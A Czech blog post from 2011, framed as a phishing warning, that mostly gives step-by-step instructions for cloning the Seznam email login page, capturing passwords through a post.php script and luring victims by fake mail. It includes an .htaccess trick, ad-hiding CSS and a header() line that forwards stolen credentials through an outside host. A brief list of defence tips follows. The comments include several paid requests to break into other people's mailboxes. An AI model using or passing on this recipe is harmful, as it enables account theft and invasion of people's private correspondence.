Hacknutí hesla na e-mail - sociotechnika || na co dávat pozor?
Pomůžete mi hacknout heslo na email? Častá otázka s kterou se setkávám častěji a častěji, přiblížením jednoho z mnoha způsobů "hacknutí" e-mailu bych rád ukázal na jednoduchost a tím vás varoval na chyby, které mnozí z vás dělají. Popíšem si útok sociotechnika...
Aktualizováno 11.12.2011
"Jen dvě věci na světě jsou nekonečné...Vesmír a lidská hloupost...Tím prvním si ovšem nejsem jist..." Albert Einstein
Budem brát v úvahu, že útočník si vezme prohlášení pana Alberta jako radu a hlouposti lidí (hlouposti vaší) využije. Útok na váš email tedy může probíhat takto: kliknete na odkaz, zobrazí se výzva k přihlášení, přihlásíte se a čtete obsah stránek. VAŠE HESLO BYLO PROZRAZENO!
Hesla typu "Q.q!SaW_2" jsou zbytečná!
- stažená přihlašovací stránka (poslouží k vytvoření fake kopie)
- šikovně zvolená doména (klidně i druhého řádu, ovšem přesvědčivost klesá)
- základní znalost php a html (bo bezmyšlenkové stažení níže uvedených kodů :o) lol)
- šikovnost a využití vaší hlouposti
Co útočníkovi stačí:
Jak bude postupovat:
- jde na přihlašovací stránku a stáhne ji podobně jako na obrázku
- vytvoří si soubor například post.php a do něj vloží script, který zpracuje přijaté informace z kopie a odešle je například na email, script může vypadat třebas takto - zde
- otevře si zdrojový kod stažené stránky s loginem a upraví hodnotu atributu action="neco" na action="post.php" viz. obrázek
- nyní má post.php, složku souborů která vznikla stažením přihlašovací stránky a samotnou přihlašovací stránku
- přihlásí se na svůj hosting (například na wz.cz ) a soubory tam uploaduje
- nyní když zadá adresu která mu tímto vznikne www.jehohosting.cz/prihlasovacistranka.htm načte se klasické přihlášení, s tím rozdílem že zadaná hesla odesílá na email a poté přesměrovává na originální stránku...
- takový odkaz pak může poslat pomocí fake maileru nebo icq
Pár tipů
Umístěním .htaccess s tímto řádkem (umístění musí být v adresáři s login.html) docílíte zobrazení stránky i při "špatně zadané" url. Využití může být pro modifikaci url k zvýšení důvěryhodnosti.
ErrorDocument 404 /login.html
Dále třeba zobrazení reklamy na freehostingu může být nepříjemná věc, stránka pak na první pohled není reálná. Porušení pravidel freehostingů, ale skrytí reklamy dosáhnete umístěním reklamy do tagů div a pomocí css nastavíte display: none. Příklad:
<div style="display: none;"><!--reklama--></div>
Pokud chcete aby bylo přihlašování na fake webu funkční, můžete využít projektu GET2POST a v souboru send.php namísto přesměrování zaslat správné údaje ke skutečnému zpracování. V ukazkových souborech stačí nahradit řádek začínající header tímto:
header("location: http://www.soom.cz/projects/get2post/resend.php?username=".$user."&password=".$pass."&
login=p%C5%99ihl%C3%A1sit+se&serviceid=email&disablessl=0&forcessl=0&lang=cz&logintype=seznam&
returnurl=http%3A%2F%2Femail.seznam.cz%2Fticket&forcerelogin=0&coid=
&uri=https%3A%2F%2Flogin.szn.cz%2FloginProcess&domain=".$dom);
Jak se bránit? Stačí dodržovat tyto zásady:
- neklikejte na odkazy příchozí z neznámých adres a čísel
- neklikejte na odkazy které mají podivnou url
- zbystřete jestliže po vás odkaz vyžaduje heslo
- čtěte url a uvažujte
- pozor! nepřihlašujte se na veřejných terminálech (přesměrování například pomoci FuckDNS)
Odkazy
Testovací balík s připravenými soubory pro hesla seznamu (obsahuje v post.php řádek, starající se o informování napadeného uživatele!): zde
Vše slouží k prostudování hrozby přicházející z této strany, vaše počínání jde mimo mou osobu a veškerou odpovědnost tím berete na sebe! Zneužití je trestné!
Komentáře
mohl by mi někdo poradit ja se dostanu do emailu bez hesla????diky Majkl.69.69@seznam.cz
Kdyz je email "bez hesla" tak ho nezadavej
. Tento text je jen vystraha a ukazani jednoduchosti vytvoreni fake stranky, neni to navod jak se dostavat do cizich emailu > porusovani listovniho tajemstvi. Jinak predpokladam ze jsi necetl ani clanek a jestli si myslis, ze ti nekdo honem bude posilat spousty navodu na email jsi myslim na omylu...
nabizim financni odmenu za zjisteni hesla na mail seznam.cz, ktery mi byl ukraden - nabidky prosim na trust76@seznam.cz (o dalsim postupu se domluvime)
Ahoj,
Před nedávnem z kruhů administrátorů unikla informace o možnosti získat heslo od cizího účtu a serverech společnosti Seznam ®. Tuto metodu používá admin, pokud není k dispozici Seznam databáze. Je to metoda mailového bota.
atd... PŘÍSPĚVEK SMAZÁN
editovano: kdosiodjinud
PS: zkoušej to jinde
Pánové vůbec tomu nerozumim jo ,ale hádáte se o píčovinách....lépe řečeno škoda času ;-)
nabizim financni odmenu za zjisteni hesla na mail centrum.cz, ktery mi byl ukraden - nabidky prosim na leon70@seznam.cz (o dalsim postupu se domluvime)
lide.cz
Lucisek162@seznam.cz
heslo:******
---------------------------------
EDITOVANO: nepastuj sem to co zjistis, davas tim najevo porusovani postovniho tajemstvi - mohl by jsi spatne skoncit
KdoSiOdJinud
Nikdy bych se neozval, kdyby nekteri lide nevedly takove reci. I kdyby si chtel kdosiodjinud pomoci techto 'clanku' honit EGO, nam ostatnim po tm muze byt prd. Kazdej dela to, co ho bavi. Jen takovej priklad za vsechny: S vytunenym autem, ktere ma jednoznacne odlisne parametry od seriaku bys taky nemel vyjizdet na silnice, protoze to je protizakonne a trestne. Ozyva se nekdo na portalech o auto-tuningu s tim, ze schvalne pisi takove clanky, aby si zvysili navstevnost a navic lidi nabadaji k 'trestne' cinnosti? Nikdy jsem si nevsiml. A kdyz uz jsme u toho: Sam jsem autorem nekolika clanku, ktere koluji po internetu a zvysuji navstevnost nekterych portalu, kteri je maji v mirrorech. Jsem proto spatny? Ja myslim, ze nejsem.
Alfarate: Tecka! je konstanta udavajici, ukonceni kodu.
Ty by ses nikdy neozval kdybych ja nenapsal tenhle komentar, ja bych se nikdy neozval kdyby autor nenapsal tenhle clanek, jakej je v tom rozdil?
Kvoky: Porad ti nedochazi ze places na spatnem hrobe. Neco ti ukazu:
http://milw0rm.com/exploits/5092
Timhle exploitem se da hacknout velka cast stroju na internetu, ktere bezi na Linuxu. Napis qaazovi, ze je kreten kdyz to publikoval. Je cech takze se s nim pohodlne domluvis. Nebo:
http://blogs.zdnet.com/security/?p=1061
Napis autorum ze jsou kokoti, kdyz publikuji neco. co muzou lamy zneuzit a ziskat tak pod kontrolu celej system.
V porovnani s tim co jsem ti postnul vyse je to, co napsal kdosiodjinud absolutne bezvyznamnej a smesnej clanecek (nebrat osobne, je to srovnani dvou materialu). A proto ti rikam znovu: Pokud o tom hovno vis, neplet se do toho.
Ok. chápu 'tečka!' -> jen jsem neviděl zbytek kódu...teď už rozumím
S veškerou úctou, kterou můžu dát někomu kdo píše pod zkomoleninou přezdívky jiného člověka ti řeknu, že Ti vůbec, ale vůbec nic není do toho kam co já píšu a co mě zajímá. Tvůj postoj bych pochopil kdybych popíral nějakou odbornou stránku věci, ale já jenom kritizuju něčí chovaní a na to nepotřebuju bejt fundovanej odborník.
Ha! A jsme u toho! Tobe muze byt hovno po tom, o cem kdosiodjinud pise, protoze o tom, zaprve hovno vis a zadruhe je ciste jeho vec. Ted budes kontrovat tim, ze jsi vyslovil jen svuj nazor. Na to ja ti odpovim, ze ja vyslovuju muj podlozenej nazor na tve chabe argumenty a pokus o moralni napravu zkazene populace. Vrat se radsi ke sve oblibene gamese, abys mohl udelat dalsi level a napis o tom plnohodnotny a moralni clanek, ktery pomuze vsem, kdo tuto hru hraje a nebudes tim podporovat mailuchtive lamy.
Alfarate: (define Tecka! (display ".")) kapisto hombre?
Aa, tak uz se dostavame k urazkam... pak se dostaneme k tomu kdo je jak ubohej ze ma na tuhle debilni diskusi cas atd...
A ted vazne: Ty mi opravdu nemas rikat co ja mam delat a co ne ... jako ja to nerikam asi kdosiodjinud... v podstate jediny co mi vadi je, ze si rika neco jineho dela nez dela... Kdyby mi rekl ano, nehackuju z cistych umyslu, no a co? ...tak ja uz sem napisu... myslel jsem, že pokud sem napíšu a ubiju ho argumenty tak se pak přizná, nebo aspoň část uzná...
A pokud ti to nestačí tak ještě něco: on si píše blog... tudíž své postoje a názory chce ventilovat na veřejnost a musí počítat s tím, že se někomu líbit nebudou, já mu do komentářů pod článkem napsal komentář a ten byl určen pouze jemu. Jako by on napsal článek do novin, my se spolu o něm bavili a ty by ses do toho vetřel, děláš to tak i normálně?
tohle je verejna diskuse, ceka se na nazory vsech! Za svymi nazory si stojim a ten clanek bych hajil, jen mi prijde nesmyslne se dohadovat s nekym, kdo tady akorad hleda kazdy prepis ve vete a chybku (viz. tecka!)
A mě přijde zbytečné se hádat s někým, kdo nechápe ani pokus o legraci při konverzaci. :-) snad i anti-kvoky pochopil....ze to byl nadneseny dotaz :-) -> ty ne. Bohuzel. Ale to neni podstatne.
kvoky: Pokud problematice nerozumis, neplet se do ni. Internet je plnej mnohem horsiho materialu nez je notoricky proflaknuta vec, kterou vyuziva kdejakej malware. Taky nesouhlasim s prezentaci dane problematiky tak, jak to udelal kdosiodjinud. Ale reknu ti jedno: Je lepsi, ze se o problemu zminil. Proc? Kdyby se o takovych vecech nepsalo, internet by byl plny zombies (infikovane pocitace vetsinou pripojene do botnetu [sit infikovanych pocitacu rizenych jedincem nebo skupinou {pro rejpaly - ano, je to popsano hodne zjednodusene}]). I tak je jich vice nez je zdravo. A proc? Protoze moralisti a yntelygenti jako ty, kteri o veci vedi hovno, se dovolavaji potrestat snahu cloveka o problemu informovat. Pokud ti vadi, ze nekdo cte cizi postu (takove bestie odsuzuji a nesnasim), pak vez, ze se k nim da dostat mnohem snazsi cestou. Navic ne k jednotlivym uctum ale k celym schrankam. Mohl bych sem napsat jak. Ovsem pak by se ozval moralista a yntelygent kvoky se svymi stupidnimi pripominkami. Tecka!
Jen by mě zajímalo...proč má tečka za sebou vykřičník. Nějaký syntax error
pekna prezdivka... tak zaprve ... ja obecne nemam nic proti white hackerum za ktereho se pan kdosiodjinud vydava... Jenze on jen "hackuje" cizi weby, pise clanky o kradeni hesel na email a schovava se za statut hodného hackera. Jaké má úmysly nevím, dalo by se spekulovat jestli si chce zvysit navstevnost, citit se dulezite nebo neco jineho, ale rozhodne si myslim ze za jeho jednanim nejsou ciste umysly.
asi bych mel pripomenout, ze jsem nikdy nerekl ani nenapsal ze jsem white hacker bo hacker, pisu to co vim a to co chci. Zadne silnejsi umysly neskryvam a moje vecerni zaliba neni "hackovat" weby. To pouze mistr alfarate a kvoky stale zduraznuji slova white hacker a hackovani webu
Resp já si nemusím říkat bloger jen kvuli tomu, že bloguju. Ale jsem bloger? Ano. Člověk je tím, jaké činy vykonává.Blogování je má 'večerní záliba' a tak jsem prostě bloger, i když si můži řikat publicista.
Jsi hacker, tak si užívej svou ulozorní slávu :-)
Na internet dám návod na výrobu atomový bomby abych ukázal jak je to snadný. Kdybys chtěl lidi upozornit určitě bys nedával do tagů jak hacknout a podobně. A k tomu fuckDNS ... Zase ukazuješ jak je to snadný? .... ty seš takovej samaritán.... ještě že tě máme.
Jestli takovy navod mas a nechces ho davat na internet, posli mi ho, rad si ho prectu a dozvim se neco noveho. Zneuziti FuckDNS? Kde vydis zneuziti? Ucel je predevsim blokace www, napriklad ve skole by se to dalo aplikovat na terminaly a filtrovat on-line hry atd...
Treba tady, pouziju tvoje vlastni slova...
- pozor! nepřihlašujte se na veřejných terminálech (přesměrování například pomoci FuckDNS). Atomová bomba byla nadsázka,to si snad pochopil.
fuckDNS vyuziva souboru ktery se stara napriklad o to aby jsi mel 127.0.0.1 jako localhost, muzes si to diky nemu zmenit, je vhodny pro blokaci stranek, ale jde i zneuzit... nerucim za to jak to kdo vyuzije
A to si ty určitě nechtěl, proto si to nazval fuckDNS... jako pochopil bych nazev blockDNS. Uz z nazvu vypovida, ze se snazis neco ofuckovat... obejít... hacknout. No a pak zase ty tagy:
dns lookup přesměrování hosts soubor podfuk podvržení hack
Takže ty mi tvrdíš, že distribuuješ program kterej je uloženej v sekci hacking, s tagy hack, podvržení a podfuk a ty si nechtel aby to nekdo jakkoli zneuzil?
vyuziti je ruzne - nazev je takovy protoze to pracuje s DNS az na strane pc, i blokace je zpusobena nastavenim nekorektni ip pod funkcni domenou, v sekci hacking je to proto, ze je to "ochcavka"... pripoustim vyuziti hodne laka a bylo to i cast umyslu, ale diskuse o fuckdns nepatri sem - prave delam rozsireni ktere by vam dalo zapravdu, vaham jestli ho dat ke stazeni
Pokud koukám na název článku, troufám si říci, že 90% lidí, kteří příjdou na tento odkaz prostě chce někomu vlézt na mail. Jak je poučíš? Akorát jim ukážeš další způsob (hodně staré) demence, jak někomu otravovat život. Jak říká kvoky: hraješ si na white, ale děláš věci, které akorát tak dělají špínu na internetu. Ale je to jedno....tvůj web nepředstavuje nebezpečí ohledně nákyzy nevinných lam, které chtějí číst maily své přítelkyně. A myslím že je zřejmé, že tyto články píšeš pouze kvuli zvýšení UIP->publicita a ne poučení.
Tak jako v mnoha vecech, je toto vec nazoru. Ano podal jsem navod v docela srozumitelny (v porovnanim s ucinnosti) norme. Ale jestli jsi cetl nekdy prirucku napriklad spravce site, urcite jsi si vsiml ze text je podavan ze strany "hacku?"... Jiny priklad: Byvaji technicke vystavy a vystavy kde se poukazuje na bezpecnost klasickych dvernich zamku, na takovych vystavach se i ukazuje jak zamek otevrit - to jak si to preberou ucastnici predvadecky je uz na nich, proto tu mame zakony
Každý kdo je normální nemůže tenhle článek brát vážně....už podle názvu se jedná o tzv. SEO článek, který má akorát tak za úkol zvednout návštěvnost. Je údělem toho, za koho se vydáváš lákat na svůj web lamu vedle lamy?
Nazev (podle tebe SEO ) koresponduje s obsahem, nevidim v tom problem. Jestli vylakam lamu? Kdyz ji to pouci proc ne? Ty snad pises jen pro odborniky? Clanek neni typem jak pouzivat WWWhack ci jak se to jmenuje, tech je dost. Tento clanek nahlizi na kradeze hesel z obou pohledu, jak sociotechnika, tak napadeneho...
Potřebuji zjistit heslo na email, finanční odměna samozřejmostí
jennet.y@seznam.cz
Zase upozorňuješ na chyby na jiném webu white hackře ? Komu tím pomůžeš když sem dáš zdroják na kradení hesel? Klidně si hackuj, když ti to dává pocit důležitosti, ale neschovávej se za white hacking.
tohle neni chyba, je to zpusob phishingu ktery se vice a vice rozsiruje > proto upozornuji, a ty kody? To abych ukazal jak je to snadne.... Poukazovani na chybu webu? V tom pripade jsem ted oznamil na chybu ktera se vyskytuje na vsech webech ktere maji alespon jeden formular... tot asi vse